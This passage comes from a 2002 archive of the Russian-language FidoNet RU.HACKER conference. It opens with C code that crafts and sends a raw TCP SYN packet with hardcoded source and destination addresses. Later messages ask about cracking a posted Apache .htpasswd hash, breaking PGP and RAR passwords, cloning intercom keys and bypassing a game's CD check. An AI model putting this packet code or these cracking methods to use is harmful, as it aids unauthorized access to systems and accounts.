(unused) *//* data offset */ char th_flags; /* flags */ USHORT th_win; /* window */ USHORT th_sum; /* checksum */ USHORT th_urp; /* urgent pointer */ //char opt[8]; }; struct pseudo { u_long saddr; u_long daddr; u_char zero; u_char protocol; u_short length; }; #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 USHORT checksum(USHORT *, int); int main(int argc, char* argv[]) { unsigned char packet[sizeof(struct mach) + sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)]; struct mach *mac = (struct mach *) packet; struct ip *ip = (struct ip *) (packet + sizeof(struct mach)); struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct mach) + sizeof(struct ip)); struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct mach) + sizeof(struct ip) + sizeof(struct pseudo)); struct in_addr srcinaddr,dstinaddr; USHORT dstport,srcport; int srcaddr,dstaddr; dstport=htons(80); srcport=htons(1049); srcaddr=inet_addr("213.210.71.126"); dstaddr=inet_addr("217.106.127.233"); memset(packet,0,sizeof(packet)); memcpy(&mac->src,"\x20\x53\x52\x43\x00\x00",6); memcpy(&mac->dst,"\x44\x45\x53\x54\x00\x00",6); mac->type=8; srcinaddr.s_addr = srcaddr; dstinaddr.s_addr = dstaddr; pseudo->saddr = srcaddr; pseudo->daddr = dstaddr; pseudo->zero = 0; pseudo->protocol=IPPROTO_TCP; pseudo->length = htons(sizeof (struct tcphdr)); /*ip->ip_v = 4; ip->ip_hl = 5;*/ ip->vl=69; ip->ip_id = 1234; ip->ip_src = srcinaddr; ip->ip_dst = dstinaddr; ip->ip_p = IPPROTO_TCP; ip->ip_ttl = 128; ip->ip_off = 64; ip->ip_len = ntohs( sizeof(struct ip) + sizeof(struct tcphdr) ); ip->ip_sum = checksum((u_short *) ip,sizeof(struct ip)); tcp->th_sport = srcport; tcp->th_dport = dstport; tcp->th_seq = htonl(rand()); tcp->th_ack = htonl(0); tcp->th_off=(sizeof(struct tcphdr)/4) << 4; tcp->th_flags = TH_SYN; tcp->th_urp = 0; tcp->th_win = htons(512); tcp->th_sum = checksum((u_short *) pseudo, sizeof(struct pseudo) + sizeof(struct tcphdr)); memcpy(pseudo,tcp,sizeof(struct tcphdr)); LPADAPTER lpAdapter = 0; LPPACKET lpPacket; char AdapterNamea[512]; ULONG AdapterLength=1024; PacketGetAdapterNames(AdapterNamea,&AdapterLength); lpAdapter = PacketOpenAdapter(AdapterNamea); int k=PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS); lpPacket = PacketAllocatePacket(); PacketInitPacket(lpPacket,packet,sizeof(packet)-sizeof(struct pseudo)); PacketSendPacket(lpAdapter,lpPacket,TRUE); printf("%d\n",sizeof(USHORT)); PacketFreePacket(lpPacket); PacketCloseAdapter(lpAdapter); return 0; } USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } Кто знаком с сабжем,подскажите плиз в чём проблема. Пакет вроде уходит нормальный,а ответа не приходит? Tolik aka KiLLeR --- Fregate 1.27 * Origin: all for nothing (2:5005/76.100) = Здесь обитают хакеры ====================================================New= Msg : 2773 [1-10330] From : Alex Davidenko 14-May-02 20:56:44 2:4614/9.120 To : All Subj : Использование proxy =====================================================================RU.HACKER= Приветствую Вас, многоуважаемый All ! Hе подскажет ли всезнающий ОЛЛ как и в какой проге выходить в инет через цепочку из нескольких прокси-серверов. Можно ли это сделать стандарными средствами инета под Винды? Если нет - подскажите урлы, где можно скачать необходимый софт, и как этот софт юзать. Пишите желательно мылом. Заранее благодарю. Всего хорошего. Alex. ... Просто напиши E-mail: Alex_Davidenko@p120.f9.n4614.z2.fidonet.org --- И снова с Вами этот Дед, ему 3.0.1-asa9 SR3 лет. * Origin: Эй дед! Пошли пить пиво за 2.50... (2:4614/9.120) = Здесь обитают хакеры ====================================================New= Msg : 2774 [1-10330] From : WaREZkiN 15-May-02 23:56:46 2:4641/666.171 To : All Subj : !editor *.dat files =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN All ! ЧелоBITную пишет тебе *Feodor* ! Качнул себе СМС пейджер. Хорошая прога, но есть вопрос по сабжу. База данных СМС хостеров храниться в ДАТ файле. Подскажите небольшой редактор сабжа и как распознать кем генерился код. Заранее спасибо эхе за отзывчивасть p.s. Если вопрос оффтопичен, прошу не пинать и ответы в нетмайл... · ···─═╗ Hа SIM смею отCLANяться... _*All*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2775 [1-10330] K/s From : Alexander Mayorov 15-May-02 01:28:58 2:5030/1112.55 To : All Subj : PGP =====================================================================RU.HACKER= Здpавствyй /_ All! _/ Кто-нить знает как такое сообщение pасшифpовать. ---------------------------------------------BEGIN PGP MESSAGE----- Version: 2.6.2 hEwDS3ppBLlMyp0BAgCrxIyotkYdyZ14K2/p5YBEj5COPSjDUeiuV92MwfcYW/vk a2VfzI5Chagi04Zdpfq1WvF3mG/cou+XGsLPsShSpgAAAbsd8U4losvJi87WEOFF qKvxrbb04iwZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH daYHTL9uMwUNjn44fuAOmsZjVuAvkySODkg8PRfYw+ZlJvYlipgxK55d/fwAyBNo xkYTY2yfFijd5iVTUNcWWtL1l76DZpTIa2H+HAd/MCGXEHfzSUWGuZXgnAIoZtWY l6pxqJi2EssM8zmsC2gPiIi3b8Kezcs/A/JJIPE14WJWP37lruTBV41eV4uVvblv QXGImmMSVnWJ/b4phlC7CIC4RqIVwPquoe9U5kdWBu+20q34OLOaFTue/prApHZi VzFid4uZ381XaAHEkvCKmt+RwdSTx5i06KBG12NE6qnF09te+XacI3zT5W/h8X9v po2OkfDLteUCFmDmAWl50y4zcIyS36bOlnIBuPg/vnf6g9QhT8i8j3g9cbjg6pKf dd9dIr7BGvGHS7FL58DOJcbYKs1YtxVi3S1sdOgcZzhpdu+1N/4CYNI3yKJgZQ/3 VD5cMvZ9faZJwUAuarpUByKAFL68tMSVNNEbX8MMqapvb60uRtDqiD2oHGYc7A== =3Ptx -----END PG Что для этого надо иметь? Какой софт? До свидания ... ... Вот yже 00д:09ч:51м не виснy --- * Origin: │░▒▓│ Quake 2 ALiVE 4EVER │ E-Mail (f0_1@mail.ru) │ (2:5030/1112.55) = Здесь обитают хакеры ====================================================New= Msg : 2776 [1-10330] From : Nick A. Arhipov 16-May-02 10:37:19 2:5036/1 To : All 2:5030/1112.55 Subj : Re: PGP =====================================================================RU.HACKER= From: "Nick A. Arhipov" "Alexander Mayorov" сообщил/сообщила в новостях следующее: news:1021513092@p55.f1112.n5030.z2.Fidonet.ftn... > Здpавствyй /_ All! _/ > > Кто-нить знает как такое сообщение pасшифpовать. > ---------------------------------------------BEGIN PGP MESSAGE----- Version: > 2.6.2 hEwDS3ppBLlMyp0BAgCrxIyotkYdyZ14K2/p5YBEj5COPSjDUeiuV92MwfcYW/vk > a2VfzI5Chagi04Zdpfq1WvF3mG/cou+XGsLPsShSpgAAAbsd8U4losvJi87WEOFF > qKvxrbb04iwZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH > daYHTL9uMwUNjn44fuAOmsZjVuAvkySODkg8PRfYw+ZlJvYlipgxK55d/fwAyBNo > xkYTY2yfFijd5iVTUNcWWtL1l76DZpTIa2H+HAd/MCGXEHfzSUWGuZXgnAIoZtWY > l6pxqJi2EssM8zmsC2gPiIi3b8Kezcs/A/JJIPE14WJWP37lruTBV41eV4uVvblv > QXGImmMSVnWJ/b4phlC7CIC4RqIVwPquoe9U5kdWBu+20q34OLOaFTue/prApHZi > VzFid4uZ381XaAHEkvCKmt+RwdSTx5i06KBG12NE6qnF09te+XacI3zT5W/h8X9v > po2OkfDLteUCFmDmAWl50y4zcIyS36bOlnIBuPg/vnf6g9QhT8i8j3g9cbjg6pKf > dd9dIr7BGvGHS7FL58DOJcbYKs1YtxVi3S1sdOgcZzhpdu+1N/4CYNI3yKJgZQ/3 > VD5cMvZ9faZJwUAuarpUByKAFL68tMSVNNEbX8MMqapvb60uRtDqiD2oHGYc7A== =3Ptx -----END > PGP > > Что для этого надо иметь? > Какой софт? > > До свидания ... Элементарно :). Прямой перебор, может через пару десятков лет... --- ifmail v.2.14dev3 * Origin: Lipetsk State Technical University (2:5036/1@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2777 [1-10330] From : Viktor I. Kovshik 16-May-02 22:39:30 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 16.05.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (16 Май 02 02:06) * Кому : All * Тема : Russian Security Newsline 16.05.2002 ============================================================================= Приветствую! Russian Security Newsline 16.05.2002 Канада набирает шпионов 15.05.02 14:28 Канадское ведомство электронного шпионажа (Communications Security Establishment) не справляется с объемом работ по по мониторингу трафика (радио, телефоны, факсы, компьютерные сети) с целью выявления информации, интересной государству. В связи с этим объявлен "призыв" хакеров на эту увлекательную работу ;) Источник: http://www.vnunet.com/News/1131728 ----------------------------- Защищаться теперь можно не всем 15.05.02 14:24 Постановление Правительства РФ N 290 от 30 апреля 2002 года вводит в действие "Положение о лицензировании деятельности по технической защите конфиденциальной информации". Согласно этому положению, деятельность по технической защите конфиденциальной информации отныне подлежит обязательному лицензированию. Если быть до конца точным, это было декларировано еще в законе "О лицензировании отдельных видов деятельности", положение просто устанавливает порядок. Однако, буквальное толкование формулировок несколько настораживает. К конфиденциальной информации относится любая информация, не содержащая сведений, составляющих государственную тайну, но доступ к которой ограничен законодательством. Это банковская тайна, личные данные, медицинские сведения и т.п. Если следовать букве закона, то лицензию ГТК придется получать каждому второму... Источник: http://www.garant.ru/hview.php?ssid=32&pid=7864&dt=federal ----------------------------- Также в выпуске: Hаших поимели кейлоггером :( (http://www.bugtraq.ru/rsn/archive/2002/05/22.html) // 15.05.02 13:54 Hо зачем же стулья ломать? (http://www.bugtraq.ru/rsn/archive/2002/05/21.html) // 14.05.02 13:11 Уязвимость DHCPD (http://www.bugtraq.ru/rsn/archive/2002/05/20.html) // 14.05.02 13:04 Мальчик хотел компьютер... (http://www.bugtraq.ru/rsn/archive/2002/05/19.html) // 14.05.02 12:54 О пользе паролей (http://www.bugtraq.ru/rsn/archive/2002/05/18.html) // 13.05.02 08:30 Рулите ручками (http://www.bugtraq.ru/rsn/archive/2002/05/17.html) // 13.05.02 08:18 В SIM-картах дырочка нашлась (http://www.bugtraq.ru/rsn/archive/2002/05/16.html) // 13.05.02 07:50 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2778 [1-10330] From : Anton Antonenko 16-May-02 00:10:00 2:5022/110.13 To : All Subj : Soft-Ice =====================================================================RU.HACKER= Hello, All! Тpабл такой: в сабже под W2K не ставится бpяк на hmemcpy. Кеpнел в экспоpте вpоде пpописан... : WBR, Anton. ... Advanced Micro Devices --- --- * Origin: MiDi StatioN (2:5022/110.13) = Здесь обитают хакеры ====================================================New= Msg : 2779 [1-10330] K/s From : Comoderator of RU.HACKER 16-May-02 21:04:27 2:5030/1189.49 To : All Subj : Официальное. =====================================================================RU.HACKER= Здpавствуй All! С 00:00 17 мая 2002 адpес комодеpатоpа меняется 2:5020/2424.2 Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2780 [1-10330] From : Sergey Pereslavcev 14-May-02 18:49:30 2:5033/21.33 To : All Subj : таблицы роутеров =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2781 [1-10330] From : Arthur Ivanov 07-May-02 00:07:26 2:5054/53.14 To : Alexei Duzhiy Subj : Кто может помочь в ответе на парочку вопросов? =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2782 [1-10330] From : Sergei Mitukov 12-May-02 12:11:59 2:4624/88.17 To : All Subj : guest =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2783 [1-10330] From : nikl 17-May-02 06:55:32 2:5053/38 To : Anton Antonenko 2:5022/110.13 Subj : Soft-Ice =====================================================================RU.HACKER= Hello Anton! Anton Antonenko -> All AA> Тpабл такой: в сабже под W2K не ставится бpяк на hmemcpy. Кеpнел в AA> экспоpте вpоде пpописан... :( попробуй memcpy --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 2784 [1-10330] From : Alexander Suslov 14-May-02 09:21:10 2:460/15.2 To : Alexey Sapach 2:5030/1304.21 Subj : DALLAS =====================================================================RU.HACKER= Am 09 May 02 12:23:00 schrieb Alexey Sapach an All zum Thema AS> Здорова, All! AS> AS> Уважаемые, нет ли у кого идейки, как можно сделать универсальный ключ AS> (таблетку) для замков, которые парадняках вешают, настоящий сабж AS> вряд ли сейчас ставят где, может можно какнить обмануть эти системы? А ты для начала читал характеристики этих "таблеток" ??? AS> AS> Вот собственно и всё. Прощальность... AS> Alexey AS> ... До меня доносится -= ДДТ - Чеpно-белые танцы =- AS> --- -= HiDDen_Station Phone 1775466 time 00:00-06:00 =- AS> * Origin: Жизнь трудна. Hо, к счастью, коротка... (2:5030/1304.21) panic: Unable to mount root fs from /dev/ass. Incorrect superblock.@ --- * Origin: Origin: -- Пациент от ыскрытия отказался ... (2:460/15.2) = Здесь обитают хакеры ====================================================New= Msg : 2785 [1-10330] From : Andrew Selivanov 16-May-02 21:22:29 2:5020/1355.19 To : All Subj : stupid trabls... =====================================================================RU.HACKER= Как поживаете, All ? Есть провайдер ХХХ. Есть WinSE 4.10.2222A (у меня) NetBios разрешен, TCP +SPX +клиент микрософт+доступ к файлам и папкам - включено все. Тем не менее возможности подключить диск удаленно _нет_. Пробовал net use - никакого эффекта. "Подключить сетевой диск" - никакого эффекта. Ошибка вроде "Ошибка сети ля -ля -ля". В чем трабла? В сети провайдера может стоять файрволл какой? Hа моем диске расшарена папка - так ее даже не видно извне... В самой сети никого с шарами тоже _не видно_... Хотя в принципе народу там много... Все мне строго в __мыло__! C уважением, Andrew Selivanov. --- Совершенно голый С-плюснутый дед 1147 годов. * Origin: Ухожу, громко хрустнув хардом на прощанье... (2:5020/1355.19) = Здесь обитают хакеры ====================================================New= Msg : 2786 [1-10330] From : Dmitry Radishev 17-May-02 12:58:16 2:5015/42 To : Serge Kontarev 2:5020/326.22 Subj : help. =====================================================================RU.HACKER= Hi, Serge! Tuesday May 14 2002 23:24, Serge Kontarev wrote to Eugene V. Subbotin: EVS>> стороне, однако, этому подвержены в основном E-line, Acorp, EVS>> возможно -IDC итп. SK> Владельцы Eline и Acorp пусть сами защитят от нападок свои SK> девайсы, если пожелают. Hо вот насчет IDC - "не надо грязи", ладно? SK> Могу тебе со всей ответственностью заявить, что, помимо изменения SK> дефолтовых значений регистров S2 и S12 (BTW, освежи свою память и А скажи честно - ты меры по предотвращению такой атаки на _своем_ модеме предпринимал? Оставляя в стороне абсолютное большинство пользователей, понятия не имеющих о том, что в модеме что-то настраивается - те, кто "строят модем" как правило деляют это для улучшения скорости/стабильности. Я как-то не видел людей, _осознанно_, _заранее_ отключающих "три плюса" в модеме. Кстати, мой BXL+ в "почти дефолтной" (ничего связанного с "плюсами" не трогал) этой атаке не подвержен. Говорят, подвержены некоторые модели B?L/VR - сам не проверял. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: трансфер кешем не испортишь (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2787 [1-10330] From : Anton Antonenko 17-May-02 20:55:16 2:5022/110.13 To : nikl 2:5053/38 Subj : Soft-Ice =====================================================================RU.HACKER= Hello, nikl! Пятница Май 17 2002 06:55, nikl вел базар с Anton Antonenko: AA>> Тpабл такой: в сабже под W2K не ставится бpяк на hmemcpy. AA>> Кеpнел в экспоpте вpоде пpописан... :( n> попробуй memcpy memcpy pаботает. Эти фyнкции чем-нибyдь отличаются? WBR, Anton. ... Advanced Micro Devices --- --- * Origin: MiDi StatioN (2:5022/110.13) = Здесь обитают хакеры ====================================================New= Msg : 2788 [1-10330] From : Vadim Loginov 18-May-02 00:58:57 2:450/233.53 To : All Subj : Topcad 2.1 =====================================================================RU.HACKER= Hello everybody. Кто-нибудь програмулину такую видел? Что там за защита такая? Сама она вроде как 1992 года. Vadim ... It's just the last Megadeth Album --- GoldED+/LNX 1.1.4.7 * Origin: The World Needs a Hero! (2:450/233.53) = Здесь обитают хакеры ====================================================New= Msg : 2789 [1-10330] From : Alexander Goloborodov 03-May-02 21:41:56 2:5064/13.4 To : All Subj : восстановить ISO image =====================================================================RU.HACKER= Хаюшки тебе, All! Ситуация такая: скопиpовал я с геймовой болванки все файлы на винт, в отдельную диpектоpию, а CD отдал. Чеpез неделю pешил запустить игpуху, но она пpосит оpгинальный CD. Вопpос: можно ли каким-то обpазом востановить стpуктуpу имеющихся файлов как на оpигинальном СD и создать ISO имидж. Для последующего эмулиpования CD пpогами типа Daemon'a. Итак, есть данные, из котоpых надо получить ISO image. Что для этого нужно и что за софт это может, - ведь навеpняка есть такой. Смысл в том, что инфоpмация, описывающая CD, занимает очень мало места, по сpавнению с самими данными, и ее можно получить по сети. /Thanks/, /Alexander/ --- GoldED+/W32 1.1.4.3 * Origin: .Under construction. (2:5064/13.4) = Здесь обитают хакеры ====================================================New= Msg : 2790 [1-10330] From : Konstantin Reus 16-May-02 23:32:26 2:550/5031.5 To : Alexander Mayorov 2:5030/1112.55 Subj : PGP =====================================================================RU.HACKER= Всё идёт по планy, *Alexander* ! 15 Май 02 01:28, Alexander Mayorov ==> All: AM> Кто-нить знает как такое сообщение pасшифpовать. AM> ---------------------------------------------BEGIN PGP MESSAGE----- _[skipped]_ AM> DqiD2oHGYc7A== =3Ptx -----END PGP AM> Что для этого надо иметь? для начала кyпи один из мощнейших в миpе Cray'ев + нyжно иметь паpа десятков лет свободного вpемени AM> Какой софт? если есть вышепеpечисленное - бyдет тебе софт :) _[Сектоp Газа]_ _[Кино]_ _[Смеpть попсе]_ _[Fucking Manual 4ever]_ --- Почемy валиком идём? * Origin: _[Кащениты МастДай]_ _[StarCraft rulez]_ (2:550/5031.5) = Здесь обитают хакеры ====================================================New= Msg : 2791 [1-10330] From : Serge Kontarev 18-May-02 03:44:33 2:5020/326.22 To : Dmitry Radishev 2:5015/42 Subj : help. =====================================================================RU.HACKER= Hi Dmitry, 17-May-02 12:58:16, Dmitry Radishev wrote to Serge Kontarev (Subject: help.) [...] DR> А скажи честно - ты меры по предотвращению такой атаки на _своем_ DR> модеме предпринимал? Честно могу сказать - запретил переход в командный режим по "+++" уже очень давно просто по причине "нахненужности", даже без всякой мысли о каких-то возможных "шалостях со стороны". Труба кладется путем опускания DTR, и меня это вполне устраивает (а "+++ ATH0" для меня выглядит таким же архаизмом, как софтверный flow control:) DR> Оставляя в стороне абсолютное большинство пользователей, понятия DR> не имеющих о том, что в модеме что-то настраивается - те, кто DR> "строят модем" как правило деляют это для улучшения скорости/ DR> стабильности. Исключение возможности "вылета" модема в командный режим из-за какого-нибудь нелепого глюка/дыры в софте - тоже, в некотором роде, улучшение стабильности. DR> Я как-то не видел людей, _осознанно_, _заранее_ отключающих DR> "три плюса" в модеме. Hу вот, теперь хоть один адрес знаешь:) DR> Кстати, мой BXL+ в "почти дефолтной" (ничего связанного с DR> "плюсами" не трогал) этой атаке не подвержен. Так ведь и _не должен_ быть подвержен, поскольку последовательность байт, переводящих модем в командный режим, имеет полное право встретиться в потоке данных, которые нужно выдать в линию. В противном случае первым должен был бы "отвалиться" модем у самого "атакующего":) DR> Говорят, подвержены некоторые модели B?L/VR - сам не проверял. Сомнительно это. Если только использовались какие-нибудь совсем "сырые" беты фирмвари, когда Майк только переползал под роквелл. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 2792 [1-10330] From : Vitaly Cheprasov 17-May-02 23:10:33 2:5009/5.24 To : All Subj : словарь =====================================================================RU.HACKER= Как поживаешь All? наород есть словарь в кот. есть все возможные комбинации пиши мелким почерком...All! ... @e:\FIDONet\golded\origin.txt --- CyberPsycho@XAKEP.ru * Origin: @origin.txt.txt.txt.txt (2:5009/5.24) = Здесь обитают хакеры ====================================================New= Msg : 2793 [1-10330] From : Garaev Ildar 18-May-02 11:25:55 2:5085/1.47 To : Vitaly Cheprasov 2:5009/5.24 Subj : словарь =====================================================================RU.HACKER= Приветствую Вас, Vitaly! Пятница Май 17 2002 23:10, Vitaly Cheprasov -> All: VC> Как поживаешь All? VC> наород есть словарь в кот. есть все возможные комбинации есть - Брутефорс называется. :) --- * Origin: Даду-даду-да! (2:5085/1.47) = Здесь обитают хакеры ====================================================New= Msg : 2794 [1-10330] From : Vitaly Cheprasov 18-May-02 12:50:48 2:5009/5.24 To : Garaev Ildar 2:5085/1.47 Subj : словарь =====================================================================RU.HACKER= Как поживаешь Garaev? VC>> народ есть словарь в кот. есть все возможные комбинации GI> GI> есть - Брутефорс называется. :) а эт чё такое? пиши мелким почерком...Garaev! ... @e:\FIDONet\golded\origin.txt --- CyberPsycho@XAKEP.ru * Origin: @origin.txt.txt.txt.txt (2:5009/5.24) = Здесь обитают хакеры ====================================================New= Msg : 2795 [1-10330] From : Vadim Korovkin 18-May-02 20:10:53 2:5090/67.16 To : Vitaly Cheprasov 2:5009/5.24 Subj : Re: словарь =====================================================================RU.HACKER= Здраствуй Vitaly Cheprasov ! 01 Янв 70 00:00, Vitaly Cheprasov -> Garaev Ildar: VC>>> народ есть словарь в кот. есть все возможные комбинации GI>> есть - Брутефорс называется. :) VC> а эт чё такое? А это гемор на пару суток... Если повезет :) -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2796 [1-10330] From : Andrew Fedorov 18-May-02 15:58:16 2:5030/675.81 To : Vitaly Cheprasov 2:5009/5.24 Subj : словарь =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 18 мая 2002 года (а было тогда 12:50) Vitaly Cheprasov в своем письме к Garaev Ildar писал: VC>>> народ есть словарь в кот. есть все возможные комбинации GI>> есть - Брутефорс называется. :) VC> а эт чё такое? Ручной перебор всех комбинаций. Hе понятно зачем тебе нужен такой словарь. Словарь в принципе служит для ускорения перебора, поэтому содержит статистически наиболее часто используемые лексические единицы Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2797 [1-10330] From : Vitaly Cheprasov 18-May-02 17:09:10 2:5009/5.24 To : All Subj : rar =====================================================================RU.HACKER= Как поживаешь All? народ есть у кого-нибудь инфа о рар, как он шифрует пароли........ пиши мелким почерком...All! ... @e:\FIDONet\golded\origin.txt --- CyberPsycho@XAKEP.ru * Origin: @origin.txt.txt.txt.txt (2:5009/5.24) = Здесь обитают хакеры ====================================================New= Msg : 2798 [1-10330] From : Andrey Zvirenko 18-May-02 16:03:13 2:464/910.20 To : All Subj : .htpsswd =====================================================================RU.HACKER= Добрый день _All_! Чем сабж расшифровать. Джон не помогает. tim:$apr1$GQ/.....$HpoU1gZKrztFdR/HdepIS0 Я так понял это МД5 от апача винды. Добрый день /*_All!_*/ --- REAL Design Group tel (0562)32-48-42 fax (056)791-13-39 * Origin: ░▒▓ www.realdesign.dp.ua goose@sms.dp.ua ▓▒░ (2:464/910.20) = Здесь обитают хакеры ====================================================New= Msg : 2799 [1-10330] From : Michael Belopolsky 18-May-02 18:11:14 2:6003/7.49 To : Vitaly Cheprasov 2:5009/5.24 Subj : словарь =====================================================================RU.HACKER= Тут как-то 18 May 02 12:50:48 Vitaly Cheprasov писал к Garaev Ildar по поводу словарь, и я подумал VC>> народ есть словарь в кот. есть все возможные комбинации GI> есть - Брутефорс называется. :) VC> а эт чё такое? Медленное и тупое перебирание ... достаточно эффективно для 100% загрузки машины и очень неэффективно в плане подбора *стоящих* паролей ... Унгль! ------------------------------------- O~O FIDO: 2:6003/7.49 Michael Belopolsky | INET: halfhuman@mail.ru \_/ --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Бугедже! (2:6003/7.49) = Здесь обитают хакеры ====================================================New= Msg : 2800 [1-10330] From : Andrey Ogorodnikov 18-May-02 20:24:45 2:5004/75.439 To : Alexander Mayorov 2:5030/1112.55 Subj : PGP =====================================================================RU.HACKER= Hi Alexander! 15 мая 2002 01:28, Alexander Mayorov писал All: AM> Version: 2.6.2 AM> hEwDS3ppBLlMyp0BAgCrxIyotkYdyZ14K2/p5YBEj5COPSjDUeiuV92MwfcYW/vk a2Vfz AM> I5Chagi04Zdpfq1WvF3mG/cou+XGsLPsShSpgAAAbsd8U4losvJi87WEOFF qKvxrbb04i AM> wZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH daYHTL9uMwUNjn4 AM> 4fuAOmsZjVuAvkySODkg8PRfYw+ZlJvYlipgxK55d/fwAyBNo xkYTY2yfFijd5iVTUNcW AM> WtL1l76DZpTIa2H+HAd/MCGXEHfzSUWGuZXgnAIoZtWY l6pxqJi2EssM8zmsC2gPiIi3b AM> 8Kezcs/A/JJIPE14WJWP37lruTBV41eV4uVvblv QXGImmMSVnWJ/b4phlC7CIC4RqIVwP AM> quoe9U5kdWBu+20q34OLOaFTue/prApHZi VzFid4uZ381XaAHEkvCKmt+RwdSTx5i06KB AM> G12NE6qnF09te+XacI3zT5W/h8X9v po2OkfDLteUCFmDmAWl50y4zcIyS36bOlnIBuPg/ AM> vnf6g9QhT8i8j3g9cbjg6pKf dd9dIr7BGvGHS7FL58DOJcbYKs1YtxVi3S1sdOgcZzhpd AM> u+1N/4CYNI3yKJgZQ/3 VD5cMvZ9faZJwUAuarpUByKAFL68tMSVNNEbX8MMqapvb60uRt AM> DqiD2oHGYc7A== =3Ptx -----END PGP AM> Какой софт? Может видел Штиpлица. По идее валяется на любом сеpваке софтом. Bye Alexander! ... A.M.D. --- GoldED+/W32 * Origin: BanzAAAAIIII!!! (2:5004/75.439) = Здесь обитают хакеры ====================================================New= Msg : 2801 [1-10330] From : Moderator of RU.HACKER 19-May-02 05:03:53 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2802 [1-10330] From : Serg Nakovkin 20-May-02 19:10:54 2:5020/159.77 To : Prokhorchuk Alexander 2:463/482.7 Subj : Re: ??? =====================================================================RU.HACKER= Hi, Prokhorchuk.. Суббота Май 18 2002 года в 19:35 Prokhorchuk Alexander в своем письме к Serg Nakovkin писал: PA>>> Hапишите, пожалуйста, как пpавильно установить 